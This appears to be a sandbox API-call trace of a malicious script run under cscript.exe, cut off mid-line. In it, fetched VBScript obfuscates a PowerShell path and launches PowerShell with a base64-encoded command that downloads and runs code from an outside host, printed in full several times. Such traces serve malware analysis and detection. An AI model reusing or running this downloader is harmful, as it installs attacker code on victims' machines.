	[0088.866] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x112f38 | out: ppvObject=0x112f38*=0x0) returned 0x80004002
	[0088.866] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.866] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0088.867] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x64c6bc8 | out: ppvObject=0x64c6bc8*=0x0) returned 0x80004002
	[0088.867] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0098.920] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0098.920] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0098.921] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0098.921] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0098.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0098.921] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Dim golovs, powernols, masnoslo, nilops\r\nset winsh = CreateObject(\"WScript.Shell\")\r\nset winenv = winsh.Environment(\"Process\")\r\nwindir = winenv(\"WINDIR\")\r\nset Firraryuq2 = CreateObject(\"shell.application\")\r\nmasnoslo = windir+\"\\SysWOW64\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nnilops = 0\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nmasnoslo = windir+\"\\System32\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nset Firraryuq2 = nothing\r\nset winsh = nothing\r\n", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0098.921] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0098.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0098.921] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0098.921] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0098.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0098.921] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0098.921] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0098.922] GetTickCount () returned 0x114ff56
	[0098.922] GetTickCount () returned 0x114ff56
	[0098.922] malloc (_Size=0x408) returned 0x402d30
	[0098.923] malloc (_Size=0x808) returned 0x40ad00
	[0098.923] malloc (_Size=0x200) returned 0x3f3e90
	[0098.923] realloc (_Block=0x3f3e90, _Size=0x400) returned 0x3f3e90
	[0098.924] free (_Block=0x3f3e90) 
	[0098.924] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0098.924] malloc (_Size=0x70) returned 0x3e0100
	[0098.926] malloc (_Size=0x1008) returned 0x40b510
	[0098.926] malloc (_Size=0xf68) returned 0x40c520
	[0098.926] GetCurrentThreadId () returned 0x9a8
	[0098.926] GetCurrentThreadId () returned 0x9a8
	[0098.926] GetCurrentThreadId () returned 0x9a8
	[0098.926] GetCurrentThreadId () returned 0x9a8
	[0098.926] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0098.926] SysStringLen (param_1=0x0) returned 0x0
	[0098.926] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x42ef40) returned 0x0
	[0098.927] DllGetClassObject (in: rclsid=0x8cc20*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x42ef40) returned 0x0
	[0098.927] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0098.927] ??2@YAPEAX_K@Z () returned 0x3ea060
	[0098.927] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26c000, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0098.927] lstrlenA (lpString="\\wscript.exe") returned 12
	[0098.927] lstrlenA (lpString="C:\\Windows\\System32\\CScript.exe") returned 31
	[0098.927] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20
	[0098.927] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0
	[0098.929] GetModuleHandleA (lpModuleName=0x0) returned 0xff6e0000
	[0098.930] GetProcAddress (hModule=0xff6e0000, lpProcName=0x1) returned 0xff6e1a60
	[0098.930] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0098.930] IUnknown:Release (This=0x3ea060) returned 0x1
	[0098.930] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26c1f0*=0x0 | out: pptlib=0x26c1f0*=0x5a48f30) returned 0x0
	[0098.931] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x26c238 | out: ppTInfo=0x26c238*=0x648a4c8) returned 0x0
	[0098.931] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a4c8, index=0xffffffff, pRefType=0x26c228 | out: pRefType=0x26c228*=0xfffffffe) returned 0x0
	[0098.931] ITypeInfo:GetRefTypeInfo (in: This=0x648a4c8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c128 | out: ppTInfo=0x7fef3c5c128*=0x648a520) returned 0x0
	[0098.931] IUnknown:Release (This=0x648a4c8) returned 0x1
	[0098.931] IUnknown:Release (This=0x5a48f30) returned 0x2
	[0098.931] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0098.931] ITypeInfo:LocalGetIDsOfNames (This=0x648a520) returned 0x0
	[0098.931] IUnknown:Release (This=0x648a520) returned 0x1
	[0098.931] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0098.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0098.931] ITypeInfo:LocalInvoke (This=0x648a520) returned 0x0
	[0098.932] ITypeLib:GetTypeComp (in: This=0x3ea060, ppTComp=0x60738 | out: ppTComp=0x60738*=0x6c006500000008) returned 0x0
	[0098.932] lstrlenW (lpString="Process") returned 7
	[0098.932] lstrlenW (lpString="SYSTEM") returned 6
	[0098.932] lstrlenW (lpString="Process") returned 7
	[0098.932] lstrlenW (lpString="USER") returned 4
	[0098.932] lstrlenW (lpString="Process") returned 7
	[0098.932] lstrlenW (lpString="VOLATILE") returned 8
	[0098.932] lstrlenW (lpString="Process") returned 7
	[0098.932] lstrlenW (lpString="PROCESS") returned 7
	[0098.932] ??2@YAPEAX_K@Z () returned 0x42c9a0
	[0098.932] IUnknown:Release (This=0x648a520) returned 0x1
	[0098.932] IUnknown:Release (This=0x42c9f0) returned 0x0
	[0098.932] IUnknown:Release (This=0x648a730) returned 0x0
	[0098.932] ??3@YAXPEAX@Z () returned 0x7e00390001
	[0098.932] IUnknown:Release (This=0x42c9a0) returned 0x1
	[0098.932] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26bf50*=0x3ea060 | out: pptlib=0x26bf50*=0x5a48f30) returned 0x0
	[0098.933] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52e90*(Data1=0xf935dc29, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), ppTInfo=0x26bf98 | out: ppTInfo=0x26bf98*=0x648a6d8) returned 0x0
	[0098.933] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a6d8, index=0xffffffff, pRefType=0x26bf88 | out: pRefType=0x26bf88*=0xfffffffe) returned 0x0
	[0098.933] ITypeInfo:GetRefTypeInfo (in: This=0x648a6d8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c2a8 | out: ppTInfo=0x7fef3c5c2a8*=0x648a730) returned 0x0
	[0098.934] IUnknown:Release (This=0x648a6d8) returned 0x1
	[0098.934] IUnknown:Release (This=0x5a48f30) returned 0x2
	[0098.934] IUnknown:AddRef (This=0x648a730) returned 0x2
	[0098.934] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0098.934] ITypeInfo:LocalInvoke (This=0x648a730) returned 0x0
	[0098.934] GetEnvironmentVariableW (in: lpName="WINDIR", lpBuffer=0x26b890, nSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa
	[0098.934] IUnknown:Release (This=0x648a730) returned 0x1
	[0098.934] CLSIDFromProgIDEx (in: lpszProgID="shell.application", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0098.934] SysStringLen (param_1=0x0) returned 0x0
	[0098.934] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x7fefe4b8d20) returned 0x0
	[0098.934] Shell:IUnknown:QueryInterface (in: This=0x7fefe4b8d20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26c1d8 | out: ppvObject=0x26c1d8*=0x0) returned 0x80004002
	[0098.934] Shell:IClassFactory:CreateInstance (in: This=0x7fefe4b8d20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1c0 | out: ppvObject=0x26c1c0*=0x649a5e0) returned 0x0
	[0098.935] Shell:IUnknown:Release (This=0x7fefe4b8d20) returned 0x1
	[0098.935] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c198 | out: ppvObject=0x26c198*=0x649a620) returned 0x0
	[0098.935] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0098.935] Shell:IObjectWithSite:SetSite (This=0x649a620, pUnkSite=0x42ef40) returned 0x0
	[0098.935] XMLHTTPRequest:IUnknown:AddRef (This=0x42ef40) returned 0x2
	[0098.935] Shell:IUnknown:Release (This=0x649a620) returned 0x1
	[0098.935] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1a8 | out: ppvObject=0x26c1a8*=0x649a5e0) returned 0x0
	[0098.935] Shell:IUnknown:AddRef (This=0x649a5e0) returned 0x3
	[0098.935] Shell:IUnknown:Release (This=0x649a5e0) returned 0x2
	[0098.935] Shell:IUnknown:Release (This=0x649a5e0) returned 0x1
	[0098.935] Shell:IUnknown:AddRef (This=0x649a5e0) returned 0x2
	[0098.935] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0098.936] Shell:IDispatch:GetIDsOfNames (in: This=0x649a5e0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0098.941] Shell:IUnknown:AddRef (This=0x649a5e0) returned 0x2
	[0098.941] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0098.941] Shell:IDispatch:Invoke (in: This=0x649a5e0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x0) returned 0x0
	[0099.135] Shell:IUnknown:Release (This=0x649a5e0) returned 0x1
	[0099.135] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0099.135] Shell:IDispatch:GetIDsOfNames (in: This=0x649a5e0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0099.136] Shell:IUnknown:AddRef (This=0x649a5e0) returned 0x2
	[0099.136] Shell:IUnknown:QueryInterface (in: This=0x649a5e0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0099.136] Shell:IDispatch:Invoke (in: This=0x649a5e0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC 